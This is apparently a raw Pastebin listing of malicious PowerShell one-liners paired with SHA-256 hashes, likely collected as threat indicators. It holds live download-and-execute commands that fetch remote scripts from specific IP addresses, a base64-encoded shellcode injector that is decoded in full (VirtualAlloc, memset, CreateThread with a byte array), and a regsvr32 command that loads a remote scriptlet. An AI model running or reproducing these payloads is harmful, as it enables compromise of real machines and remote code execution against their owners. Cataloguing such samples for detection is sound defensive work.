  522. ffed4c39ee055d8a1e7e7f71c7161952809667eeea9ddb42eb32aad6c2e49a09
  523. powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://71.162.136.172:25/passwordpolicy'))"
  524. 77cdfb7a86ddcb20168828f30d6d35c8c24c01bc7aac1b2a1e726a574dba7cde
  525. powershell.exe -window hidden -enc JABsAEMAeQBYACAAPQAgACcAJAA4AEQANgBXACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkADgARAA2AFcAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgA4ACwAMAB4ADEANgAsADAAeAA4ADcALAAwAHgANwA4ACwAMAB4ADAAMQAsADAAeABkADkALAAwAHgAZQBjACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA0ADYALAAwAHgAMABmACwAMAB4ADAAMwAsADAAeAA0ADYALAAwAHgAMQA5ACwAMAB4ADYANQAsADAAeAA4AGQALAAwAHgAZgBkACwAMAB4AGMAZAAsADAAeABlAGIALAAwAHgANgBlACwAMAB4AGYAZQAsADAAeAAwAGQALAAwAHgAOABjACwAMAB4AGUANwAsADAAeAAxAGIALAAwAHgAMwBjACwAMAB4ADgAYwAsADAAeAA5AGMALAAwAHgANgA4ACwAMAB4ADYAZQAsADAAeAAzAGMALAAwAHgAZAA2ACwAMAB4ADMAZAAsADAAeAA4ADIALAAwAHgAYgA3ACwAMAB4AGIAYQAsADAAeABkADUALAAwAHgAMQAxACwAMAB4AGIANQAsADAAeAAxADIALAAwAHgAZAA5ACwAMAB4ADkAMgAsADAAeAA3ADAALAAwAHgANAA1ACwAMAB4AGQANAAsADAAeAAyADMALAAwAHgAMgA4ACwAMAB4AGIANQAsADAAeAA3ADcALAAwAHgAYQA3ACwAMAB4ADMAMwAsADAAeABlAGEALAAwAHgANQA3ACwAMAB4ADkANgAsADAAeABmAGIALAAwAHgAZgBmACwAMAB4ADkANgAsADAAeABkAGYALAAwAHgAZQA2ACwAMAB4AGYAMgAsADAAeABjAGIALAAwAHgAOAA4ACwAMAB4ADYAZAAsADAAeABhADAALAAwAHgAZgBiACwAMAB4AGIAZAAsADAAeAAzADgALAAwAHgANwA5ACwAMAB4ADcANwAsADAAeAA4AGQALAAwAHgAYQBkACwAMAB4AGYAOQAsADAAeAA2ADQALAAwAHgANAA1ACwAMAB4AGMAZgAsADAAeAAyADgALAAwAHgAMwBiACwAMAB4AGQAZQAsADAAeAA5ADYALAAwAHgAZQBhACwAMAB4AGIAZAAsADAAeAAzADMALAAwAHgAYQAzACwAMAB4AGEAMgAsADAAeABhADUALAAwAHgANQAwACwAMAB4ADgAZQAsADAAeAA3AGQALAAwAHgANQBkACwAMAB4AGEAMgAsADAAeAA2ADQALAAwAHgANwBjACwAMAB4AGIANwAsADAAeABmAGIALAAwAHgAOAA1ACwAMAB4AGQAMwAsADAAeABmADYALAAwAHgAMwA0ACwAMAB4ADcANAAsADAAeAAyAGQALAAwAHgAMwBlACwAMAB4AGYAMgAsADAAeAA2ADcALAAwAHgANQA4ACwAMAB4ADMANgAsADAAeAAwADEALAAwAHgAMQA1ACwAMAB4ADUAYgAsADAAeAA4AGQALAAwAHgANwA4ACwAMAB4AGMAMQAsADAAeABlAGUALAAwAHgAMQA2ACwAMAB4AGQAYQAsADAAeAA4ADIALAAwAHgANAA5ACwAMAB4AGYAMwAsADAAeABkAGIALAAwAHgANAA3ACwAMAB4ADAAZgAsADAAeAA3ADAALAAwAHgAZAA3ACwAMAB4ADIAYwAsADAAeAA1AGIALAAwAHgAZABlACwAMAB4AGYAYgAsADAAeABiADMALAAwAHgAOAA4ACwAMAB4ADUANAAsADAAeAAwADcALAAwAHgAMwBmACwAMAB4ADIAZgAsADAAeABiAGIALAAwAHgAOABlACwAMAB4ADcAYgAsADAAeAAxADQALAAwAHgAMQBmACwAMAB4AGMAYgAsADAAeABkADgALAAwAHgAMwA1ACwAMAB4ADAANgAsADAAeABiADEALAAwAHgAOABmACwAMAB4ADQAYQAsADAAeAA1ADgALAAwAHgAMQBhACwAMAB4ADYAZgAsADAAeABlAGYALAAwAHgAMQAyACwAMAB4AGIANgAsADAAeAA2ADQALAAwAHgAOAAyACwAMAB4ADcAOAAsADAAeABkAGUALAAwAHgANAA5ACwAMAB4AGEAZgAsADAAeAA4ADIALAAwAHgAMQBlACwAMAB4AGMANgAsADAAeABiADgALAAwAHgAZgAxACwAMAB4ADIAYwAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4ADkAZQAsADAAeAAxAGMALAAwAHgAMAAyACwAMAB4AGIAZAAsADAAeAA1ADkALAAwAHgANgAzACwAMAB4ADMAOQAsADAAeAA3ADkALAAwAHgAZgA1ACwAMAB4ADkAYQAsADAAeABjADIALAAwAHgANwBhACwAMAB4AGQAZgAsADAAeAA1ADgALAAwAHgAOQA2ACwAMAB4ADIAYQAsADAAeAA3ADcALAAwAHgANAA5ACwAMAB4ADkANwAsADAAeABhADAALAAwAHgAOAA3ACwAMAB4ADcANgAsADAAeAA0ADIALAAwAHgANQBjACwAMAB4ADgAZAAsADAAeABlADAALAAwAHgAYQBkACwAMAB4ADAAOQAsADAAeAA4AGMALAAwAHgAZABlACwAMAB4ADQANQAsADAAeAA0ADgALAAwAHgAOABmACwAMAB4ADAAZgAsADAAeABjAGEALAAwAHgAYwA1ACwAMAB4ADYAOQAsADAAeAA3AGYALAAwAHgAYQAyACwAMAB4ADgANQAsADAAeAAyADUALAAwAHgAMwBmACwAMAB4ADEAMgAsADAAeAA2ADYALAAwAHgAOQA2ACwAMAB4AGQANwAsADAAeAA3ADgALAAwAHgANgA5ACwAMAB4AGMAOQAsADAAeABjADcALAAwAHgAOAAyACwAMAB4AGEAMwAsADAAeAA2ADIALAAwAHgANgBkACwAMAB4ADYAZAAsADAAeAAxAGEALAAwAHgAZABhACwAMAB4ADEAOQAsADAAeAAxADQALAAwAHgAMAA3ACwAMAB4ADkAMAAsADAAeABiADgALAAwAHgAZAA5ACwAMAB4ADkAZAAsADAAeABkAGMALAAwAHgAZgBhACwAMAB4ADUAMgAsADAAeAAxADIALAAwAHgAMgAwACwAMAB4AGIANAAsADAAeAA5ADIALAAwAHgANQBmACwAMAB4ADMAMgAsADAAeAAyADAALAAwAHgANQAzACwAMAB4ADIAYQAsADAAeAA2ADgALAAwAHgAZQA2ACwAMAB4ADYAYwAsADAAeAA4ADAALAAwAHgAMAA3ACwAMAB4ADAANgAsADAAeABmADkALAAwAHgAMgBmACwAMAB4ADgAZQAsADAAeAA1ADEALAAwAHgAOQA1ACwAMAB4ADIAZAAsADAAeABmADcALAAwAHgAOQA1ACwAMAB4ADMAYQAsADAAeABjAGQALAAwAHgAZAAyACwAMAB4AGEAZQAsADAAeABmADMALAAwAHgANQBiACwAMAB4ADkAZAAsADAAeABkADgALAAwAHgAZgBiACwAMAB4ADgAYgAsADAAeAAxAGQALAAwAHgAMQA4ACwAMAB4AGEAYQAsADAAeABjADEALAAwAHgAMQBkACwAMAB4ADcAMAAsADAAeAAwAGEALAAwAHgAYgAyACwAMAB4ADQAZAAsADAAeAA2ADUALAAwAHgANQA1ACwAMAB4ADYAZgAsADAAeABlADIALAAwAHgAMwA2ACwAMAB4AGMAMAAsADAAeAA5ADAALAAwAHgANQAzACwAMAB4AGUAYgAsADAAeAA0ADMALAAwAHgAZgA5ACwAMAB4ADUAOQAsADAAeABkADIALAAwAHgAYQA0ACwAMAB4AGEANgAsADAAeABhADIALAAwAHgAMwAxACwAMAB4ADMANQAsADAAeAA5AGEALAAwAHgANwA0ACwAMAB4ADcAZgAsADAAeAA0ADMALAAwAHgAZgAyACwAMAB4ADQANAA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAVwBWAGYAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFcAVgBmAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABXAFYAZgAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAGwAQwB5AFgAKQApADsAJABHAE4AeAAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAFAAeABYACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAFAAeABYACAAJABHAE4AeAAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABHAE4AeAAgACQAZQAiADsAfQA= --> $lCyX = '$8D6W = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $8D6W -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xb8,0x16,0x87,0x78,0x01,0xd9,0xec,0xd9,0x74,0x24,0xf4,0x5e,0x29,0xc9,0xb1,0x47,0x83,0xee,0xfc,0x31,0x46,0x0f,0x03,0x46,0x19,0x65,0x8d,0xfd,0xcd,0xeb,0x6e,0xfe,0x0d,0x8c,0xe7,0x1b,0x3c,0x8c,0x9c,0x68,0x6e,0x3c,0xd6,0x3d,0x82,0xb7,0xba,0xd5,0x11,0xb5,0x12,0xd9,0x92,0x70,0x45,0xd4,0x23,0x28,0xb5,0x77,0xa7,0x33,0xea,0x57,0x96,0xfb,0xff,0x96,0xdf,0xe6,0xf2,0xcb,0x88,0x6d,0xa0,0xfb,0xbd,0x38,0x79,0x77,0x8d,0xad,0xf9,0x64,0x45,0xcf,0x28,0x3b,0xde,0x96,0xea,0xbd,0x33,0xa3,0xa2,0xa5,0x50,0x8e,0x7d,0x5d,0xa2,0x64,0x7c,0xb7,0xfb,0x85,0xd3,0xf6,0x34,0x74,0x2d,0x3e,0xf2,0x67,0x58,0x36,0x01,0x15,0x5b,0x8d,0x78,0xc1,0xee,0x16,0xda,0x82,0x49,0xf3,0xdb,0x47,0x0f,0x70,0xd7,0x2c,0x5b,0xde,0xfb,0xb3,0x88,0x54,0x07,0x3f,0x2f,0xbb,0x8e,0x7b,0x14,0x1f,0xcb,0xd8,0x35,0x06,0xb1,0x8f,0x4a,0x58,0x1a,0x6f,0xef,0x12,0xb6,0x64,0x82,0x78,0xde,0x49,0xaf,0x82,0x1e,0xc6,0xb8,0xf1,0x2c,0x49,0x13,0x9e,0x1c,0x02,0xbd,0x59,0x63,0x39,0x79,0xf5,0x9a,0xc2,0x7a,0xdf,0x58,0x96,0x2a,0x77,0x49,0x97,0xa0,0x87,0x76,0x42,0x5c,0x8d,0xe0,0xad,0x09,0x8c,0xde,0x45,0x48,0x8f,0x0f,0xca,0xc5,0x69,0x7f,0xa2,0x85,0x25,0x3f,0x12,0x66,0x96,0xd7,0x78,0x69,0xc9,0xc7,0x82,0xa3,0x62,0x6d,0x6d,0x1a,0xda,0x19,0x14,0x07,0x90,0xb8,0xd9,0x9d,0xdc,0xfa,0x52,0x12,0x20,0xb4,0x92,0x5f,0x32,0x20,0x53,0x2a,0x68,0xe6,0x6c,0x80,0x07,0x06,0xf9,0x2f,0x8e,0x51,0x95,0x2d,0xf7,0x95,0x3a,0xcd,0xd2,0xae,0xf3,0x5b,0x9d,0xd8,0xfb,0x8b,0x1d,0x18,0xaa,0xc1,0x1d,0x70,0x0a,0xb2,0x4d,0x65,0x55,0x6f,0xe2,0x36,0xc0,0x90,0x53,0xeb,0x43,0xf9,0x59,0xd2,0xa4,0xa6,0xa2,0x31,0x35,0x9a,0x74,0x7f,0x43,0xf2,0x44;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$WVf=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($WVf.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$WVf,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($lCyX));$GNx = "-enc ";if([IntPtr]::Size -eq 8){$PxX = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $PxX $GNx $e"}else{;iex "& powershell $GNx $e";}
  526. ed06790b36e5a3581022a5d19e2f198011bb3c3a57e5ea4ae149906414fd2b6d
  527. powerShell.exe -WindowStyle hiddeN -ExeCuTionPolicy BypasS -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwAxADcAOQAuADQAMwAuADEAMwAzAC4ANAA3AC8AdQBwAGQAYQB0AHAAbwAuAGoAcABnACAAcwBjAHIAbwBiAGoALgBkAGwAbAAKAA== --> regsvr32 /u /s /i:http://179.43.133.47/updatpo.jpg scrobj.dll
  528. 7950e0bc6059abe8d7428775568a31bf16648ce465f0944340c647728caa3eb4
  529. powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://173.203.86.247:8089/a'));
  530. 81a04ad251e55242a16e13d5b58f40431ec5ece6d0fc258c38d75b6c4b8cef3a
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top